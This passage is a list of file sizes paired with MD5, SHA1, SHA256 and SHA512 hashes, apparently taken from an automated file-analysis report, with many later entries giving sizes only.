SHA512422a3cd972e97f45296a476a0eea266f9608f5aa8cc1176ee94e3a9cb38ce131d888779aa4ece44d9bd4bf8a75746715f39f067cdc8fc658eaca7e4c85f566e1
-
Filesize
814KB
MD59d642c9b855557b57f0d58039cd74b9a
SHA1cb3eedb83e0a5249887c812cf95ec33930b82118
SHA256e748a5e1ec582b6e592bbae4f933d4fe66aa7fec8ba85370187f157969d1afff
SHA5126495eaff56293e605e711dce717e6898317106aeab6722d827090dbfa9d100b469b071498f3bf8d7b64c2d59ecb721aa1059aa5f9068f9766a52b447035f256e
-
Filesize
1.9MB
MD51c98a21a92e4c152ae5db75ea0eb61b3
SHA1d60c254270b7581f1fad3dbd5a8a5f1386531bf0
SHA256e5e4ca7f4cc8b8dd11de56f636b842cd9b795c96f1bc3b60bb70e7e82ae527c1
SHA512c5f481f90d1ca21c8995081e6577c1e25275083ea620813da9a9eabb301e1f5b148bd304f1a20b054a215a8fca5714c89d85c5a908a549039bed57e2c75a2ad1
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
702B
MD52a6aed4f91b4c1c042c6e8282cc1193e
SHA10573d41566d7d4159b1aa1d0042c3e99dde1076c
SHA256e5975621efdc334039ee98248e374e32094389b3327c559060903de1e78b5e6b
SHA51248af913bc5d9125c3ebbebd8a1d37685128d8d0778706368008ed8c7312a16cd4ddf57b98c5b07d7cd7046a2976fc97259ac21c838404ed3913456ac37b24d70
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
7.9MB
MD5786c956e1bf53025bb1540e382fa798a
SHA1bdd8023a1c1021cf60eeccb586e3501159c935dd
SHA2564edaa4935b6f7ac6eb734a7a61be9135142033700be37390e93c9401dc3cf26b
SHA51209857cffbbc3834a708f1f7c7386768b67ed8748ce131c0a8646d3478cff90d9a55c8bf21df934c6f17aa7a8804c349d7f25d090cd0f7fcf175c9bf67a01fe7f
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB